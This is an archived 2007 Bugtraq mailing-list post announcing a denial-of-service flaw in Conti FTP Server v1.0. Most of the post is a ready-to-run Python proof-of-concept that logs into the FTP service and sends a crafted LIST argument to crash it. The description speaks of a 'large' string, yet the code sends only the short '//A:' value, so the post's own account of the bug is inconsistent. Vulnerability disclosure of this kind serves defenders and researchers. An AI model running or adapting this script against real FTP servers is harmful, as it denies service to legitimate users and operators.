lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Wed, 27 Jun 2007 03:24:16 +0000
From: <esc6@...h.com>
To: <bugtraq@...urityfocus.com>
Cc: 
Subject: Conti FTP Server v1.0 DoS

#Conti FTP Server v1.0 Denial of Service
#author: 35c666
#contact: :(
#Download: 
http://www.procesualitatea.ro/bestplay/Conti_FtpServer_Setup.exe
#Bug: Conti Ftp Server crashes when a large //A: string is sent, 
denying legitimate users access to their accounts.
#greetz to all  RST members at http://rstzone.net

# usr/bin/python

import socket
import time

buff = "//A:"

user = "test"
password = "test"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
   conn = s.connect(("172.16.112.129",21))
   d = s.recv(1024)
   print "Server <- " + d
   time.sleep(2)

   s.send('USER %s\r\n' % user)
   print "Client -> USER " + user
   d = s.recv(1024)
   print "Server <- " + d
   time.sleep(2)

   s.send('PASS %s\r\n' % password)
   print "Client -> PASS " + password
   d = s.recv(1024)
   print "Server <- " + d
   time.sleep(2)

   s.send('LIST %s\r\n' % buff)
   print "Client -> LIST " + buff
   d = s.recv(1024)
   print d
   time.sleep(2)

except:
   print "- Nu m-am putut conecta."

--
Click for  FHA loan, $0 lender fees, low rates & approvals nationwide
http://tagline.hushmail.com/fc/Ioyw6h4dOJ5vAvidooorO3QwkYqsdtxW1lWMSsqYoY19IzyPIitWQU/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ